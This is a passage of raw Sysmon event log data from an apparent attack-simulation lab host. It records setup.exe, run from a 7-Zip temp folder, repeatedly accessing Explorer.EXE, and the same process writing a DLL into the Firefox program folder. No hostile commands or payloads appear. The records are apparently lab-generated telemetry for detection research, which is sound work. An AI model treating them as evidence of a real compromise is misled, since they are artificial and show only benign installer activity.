64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-string-l1-1-0.dll2021-01-18 13:59:52.239 10341000x800000000000000014543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 